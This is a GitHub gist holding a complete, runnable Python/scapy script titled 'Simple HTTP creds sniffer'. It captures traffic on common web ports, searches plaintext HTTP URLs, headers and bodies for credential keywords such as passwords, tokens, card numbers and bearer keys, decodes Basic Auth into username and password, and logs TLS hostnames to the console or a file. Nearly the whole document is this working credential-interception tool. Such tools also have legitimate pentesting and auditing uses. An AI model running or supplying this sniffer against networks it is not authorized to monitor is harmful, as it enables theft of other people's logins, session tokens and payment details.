Skip to content

Instantly share code, notes, and snippets.

@caueb
Last active June 11, 2025 23:27
Show Gist options
  • Select an option

  • Save caueb/8794c0c7ccac51286527617cd0dd4bf1 to your computer and use it in GitHub Desktop.

Select an option

Save caueb/8794c0c7ccac51286527617cd0dd4bf1 to your computer and use it in GitHub Desktop.
Simple HTTP creds sniffer
#!/usr/bin/env python3
import sys
import datetime
import base64
import re
from urllib.parse import unquote
from scapy.all import sniff, Raw, IP, TCP
from scapy.layers.http import HTTPRequest
from scapy.layers.tls.handshake import TLSClientHello
from scapy.layers.tls.record import TLS
import warnings
# === ANSI Colors ===
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
RESET = "\033[0m"

# === Credential Keywords ===
# NOTE: keyword_match() lowercases the sniffed data before doing a substring
# test against these entries, so every keyword here MUST be lowercase —
# mixed-case entries (the old "userName"/"UserID") could never match and were
# dead duplicates of "username"/"userid".
keywords = [
    "username", "userid", "user_id", "login", "logon", "uname", "account",
    "password", "pass", "passwd", "pwd", "secret", "pin", "passcode", "userpass", "user_pass",
    "email", "e-mail", "useremail", "emailaddress", "email_address",
    "token", "auth", "access_token", "id_token", "session", "jwt", "sso", "oauth", "csrf", "csrf_token",
    "creditcard", "card_number", "cardnum", "cvv", "cvc", "expdate", "expiry",
    "mobile", "mfa", "otp", "2fa", "twofa", "verification", "verify", "idnumber", "id_num", "nin",
    "credentials", "authdata", "logininfo", "signin", "signup", "register",
    "authorization", "bearer", "api_key", "apikey", "api-key",
]

log_file = None          # optional output path set by the -o flag; None = console only
processed_requests = {}  # {"src_ip->url": last_seen_timestamp} deduplication cache

import time  # used for the deduplication timestamps in process_packet()
def log(message):
    """Print *message* prefixed with a timestamp; optionally append to log_file.

    ANSI color codes are kept for the console but stripped before writing to
    the log file (set via the -o flag; None disables file logging).
    """
    timestamp = datetime.datetime.now().strftime("[%d-%m-%Y %H:%M:%S]")
    full_message = f"{timestamp} {message}"
    print(full_message)
    if log_file:
        try:
            with open(log_file, "a") as f:
                f.write(strip_ansi(full_message) + "\n")
        except OSError:
            # Best-effort file logging: an unwritable log file must not stop
            # the sniffer. (Was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit.)
            pass
# Compiled once at import time; the original re-imported `re` (already imported
# at the top of the file) and re-scanned the pattern on every call.
_ANSI_ESCAPE_RE = re.compile(r'\x1b\[[0-9;]*m')


def strip_ansi(text):
    """Return *text* with all ANSI SGR color escape sequences removed."""
    return _ANSI_ESCAPE_RE.sub('', text)
def keyword_match(data):
    """Return the first credential keyword contained in *data* (case-insensitive).

    Returns None when no keyword from the module-level `keywords` list occurs
    as a substring of the lowercased input.
    """
    haystack = data.lower()
    return next((kw for kw in keywords if kw in haystack), None)
def extract_headers_and_body(raw_data):
    """Split a raw HTTP request string into (headers, body).

    The split happens at the first blank line (CRLF CRLF). When no blank line
    is present, the whole input is treated as headers and the body is "".
    """
    headers, _separator, body = raw_data.partition("\r\n\r\n")
    return headers, body
def is_http_packet(packet):
    """Heuristic: does this packet's Raw payload look like plaintext HTTP?

    Returns True when the payload contains b"HTTP" or starts with a common
    request method; False for packets with no Raw layer or on any error.
    """
    if packet.haslayer(Raw):
        try:
            data = packet[Raw].load
            return b"HTTP" in data or data.startswith(
                (b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS")
            )
        except Exception:
            # Narrowed from a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit.
            return False
    return False
def sniff_packets(interface):
    """Start a blocking scapy capture on *interface*, limited to common web ports.

    Every matching packet is handed to process_packet(); nothing is stored in
    memory (store=False).
    """
    web_ports = [
        80, 443, 8000, 8080, 8081, 8443, 9443, 8888,
        3128, 3000, 5000
    ]
    # BPF capture filter of the form "tcp port 80 or tcp port 443 or ..."
    port_filter = " or ".join(f"tcp port {port}" for port in web_ports)
    log(f"{CYAN}[*] Sniffing on interface: {interface}{RESET}")
    log(f"{CYAN}[*] Monitoring ports: {', '.join(map(str, web_ports))}{RESET}")
    sniff(iface=interface, store=False, prn=process_packet, filter=port_filter)
def get_url(packet):
    """Reconstruct the request URL from scapy's parsed HTTPRequest layer.

    Returns "http://host[:port]/path" (the port is omitted when it is the
    HTTP default 80), or None when the expected fields are missing or cannot
    be decoded — callers fall back to an ip:port URL in that case.
    """
    try:
        host = packet[HTTPRequest].Host.decode()
        path = packet[HTTPRequest].Path.decode()
        dst_port = packet[TCP].dport
    except Exception:
        # Narrowed from a bare `except:`; missing layer/field or non-UTF-8
        # header bytes land here.
        return None
    if dst_port != 80:
        return f"http://{host}:{dst_port}{path}"
    return f"http://{host}{path}"
def _is_duplicate_request(src_ip, url):
    """Record src->url and report whether it was seen within the last 2 seconds.

    Duplicates do NOT refresh the stored timestamp (matching the original
    behavior). The cache is pruned to its 50 newest entries once it exceeds
    100 keys.
    """
    now = time.time()
    request_key = f"{src_ip}->{url}"
    last_seen = processed_requests.get(request_key)
    if last_seen is not None and now - last_seen < 2:  # 2 second window
        return True
    processed_requests[request_key] = now
    if len(processed_requests) > 100:
        # Drop the 50 oldest entries by timestamp.
        for key, _ts in sorted(processed_requests.items(), key=lambda kv: kv[1])[:50]:
            del processed_requests[key]
    return False


def _report_hit(src_ip, keyword, location, detail_label, detail):
    """Log one 'Possible HTTP Credentials Found' block in the standard format."""
    log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}")
    log(f"{YELLOW}Source IP : {src_ip}{RESET}")
    log(f"{YELLOW}Keyword : {keyword}{RESET}")
    log(f"{YELLOW}Found In : {location}{RESET}")
    log(f"{YELLOW}{detail_label} : {detail}{RESET}")


def _log_basic_auth(encoded):
    """Decode the base64 token of an 'Authorization: Basic' header and log it."""
    try:
        decoded = base64.b64decode(encoded).decode()
        log(f"{YELLOW}Decoded Basic Auth : {decoded}{RESET}")
    except Exception as e:
        log(f"{YELLOW}Failed to decode Basic Auth: {e}{RESET}")


def _safe_unquote(text):
    """URL-decode *text* for readability, falling back to the input on error."""
    try:
        return unquote(text)
    except Exception:
        return text


def _handle_http_layer(packet, src_ip, dst_ip, dst_port):
    """Inspect a packet scapy parsed as HTTPRequest: URL, auth headers, body."""
    url = get_url(packet) or f"http://{dst_ip}:{dst_port}"
    if _is_duplicate_request(src_ip, url):
        return  # Skip duplicate request silently
    log(f"{GREEN}[HTTP] {src_ip} -> {url}{RESET}")

    match_url = keyword_match(url)
    if match_url:
        _report_hit(src_ip, match_url, "URL", "URL", url)

    # Headers scapy parses into attributes on HTTPRequest; focus on the
    # auth-related ones.
    http_req = packet[HTTPRequest]
    for field_name in ('Authorization', 'Cookie', 'Proxy_Authorization', 'X_Csrf_Token'):
        field_value = getattr(http_req, field_name, None)
        if not field_value:
            continue
        field_value_str = field_value.decode() if isinstance(field_value, bytes) else str(field_value)
        field_str = f"{field_name}: {field_value_str}"
        match_header = keyword_match(field_str)
        if match_header:
            _report_hit(src_ip, match_header, "Header", "Header", _safe_unquote(field_str))
            # Decode Authorization: Basic base64(user:pass)
            if field_name.lower() == "authorization" and field_value_str.startswith("Basic "):
                _log_basic_auth(field_value_str[6:].strip())

    # For HTTPRequest packets, the Raw layer usually contains just the body.
    if packet.haslayer(Raw):
        try:
            data = packet[Raw].load.decode(errors='ignore')
            match_body = keyword_match(data)
            if match_body:
                _report_hit(src_ip, match_body, "Body", "Raw", "\n" + _safe_unquote(data))
        except Exception:
            pass


def _handle_raw_fallback(packet, src_ip, dst_ip, dst_port):
    """Manually parse plaintext HTTP out of the Raw payload (no HTTPRequest layer)."""
    try:
        data = packet[Raw].load.decode(errors='ignore')
        if not data.startswith(("GET", "POST", "PUT", "HEAD", "OPTIONS", "DELETE")):
            return
        headers, body = extract_headers_and_body(data)
        request_line = headers.split("\r\n")[0] if headers else ""
        parts = request_line.split()
        if len(parts) > 1:
            url = f"http://{dst_ip}:{dst_port}{parts[1]}"
        else:
            url = f"http://{dst_ip}:{dst_port}"
        if _is_duplicate_request(src_ip, url):
            return
        log(f"{GREEN}[HTTP] {src_ip} -> {url}{RESET}")

        match_url = keyword_match(url)
        if match_url:
            _report_hit(src_ip, match_url, "URL", "URL", url)

        for line in headers.split("\r\n")[1:]:
            match_header = keyword_match(line)
            if match_header:
                _report_hit(src_ip, match_header, "Header", "Header", _safe_unquote(line.strip()))
                # Decode Authorization: Basic base64(user:pass)
                if line.lower().startswith("authorization: basic"):
                    _log_basic_auth(line.split(" ", 2)[-1].strip())

        match_body = keyword_match(body)
        if match_body:
            _report_hit(src_ip, match_body, "Body", "Raw", "\n" + _safe_unquote(body))
    except Exception as e:
        log(f"{YELLOW}[DEBUG] Fallback decode error: {e}{RESET}")


def _handle_tls_hello(packet, src_ip):
    """Log the SNI hostname from a TLS Client Hello, when scapy exposes it."""
    try:
        # NOTE(review): `ext_servername` availability depends on the scapy
        # version / loaded TLS layers — confirm against the scapy in use.
        sni = packet[TLSClientHello].ext_servername.decode()
        log(f"{CYAN}[TLS] {src_ip} -> https://{sni} (Client Hello SNI){RESET}")
    except Exception:
        pass


def process_packet(packet):
    """scapy `prn` callback: dispatch each captured TCP packet to a parser.

    Order of checks:
      1. TLS Client Hello — checked BEFORE the Raw-payload guard. In the
         original code the TLS branch sat after an early `return` for packets
         without a Raw layer, so fully-parsed TLS packets (which carry TLS
         layers instead of Raw) could never reach it.
      2. scapy-parsed HTTPRequest packets.
      3. Manual fallback parsing of any other Raw payload.
    """
    if not packet.haslayer(IP) or not packet.haslayer(TCP):
        return
    src_ip = packet[IP].src
    dst_ip = packet[IP].dst
    dst_port = packet[TCP].dport

    if packet.haslayer(TLS) and packet.haslayer(TLSClientHello):
        _handle_tls_hello(packet, src_ip)
        return

    # Skip duplicates and retransmissions - only process packets with data.
    if not packet.haslayer(Raw) or len(packet[Raw].load) == 0:
        return

    if packet.haslayer(HTTPRequest):
        _handle_http_layer(packet, src_ip, dst_ip, dst_port)
    else:
        _handle_raw_fallback(packet, src_ip, dst_ip, dst_port)
# === Entry Point ===
if __name__ == "__main__":
    # `interface` and `log_file` are module-level names; log() reads log_file.
    interface = None
    log_file = None
    args = sys.argv

    # -i <interface> is mandatory.
    if "-i" not in args:
        print("Usage: sudo python3 sniffer.py -i <interface> [-o <output_file>]")
        sys.exit(1)
    try:
        interface = args[args.index("-i") + 1]
    except IndexError:
        print("[-] Missing interface after -i")
        sys.exit(1)

    # -o <output_file> is optional.
    if "-o" in args:
        try:
            log_file = args[args.index("-o") + 1]
        except IndexError:
            print("[-] Missing filename after -o")
            sys.exit(1)
        print(f"[*] Output will be logged to: {log_file}")

    try:
        # Scapy's TLS dissector warns about unrecognized cipher suites; mute it.
        warnings.filterwarnings("ignore", message="Unknown cipher suite.*")
        sniff_packets(interface)
    except KeyboardInterrupt:
        print(f"\n{CYAN}[!] Exiting...{RESET}")
        sys.exit(0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment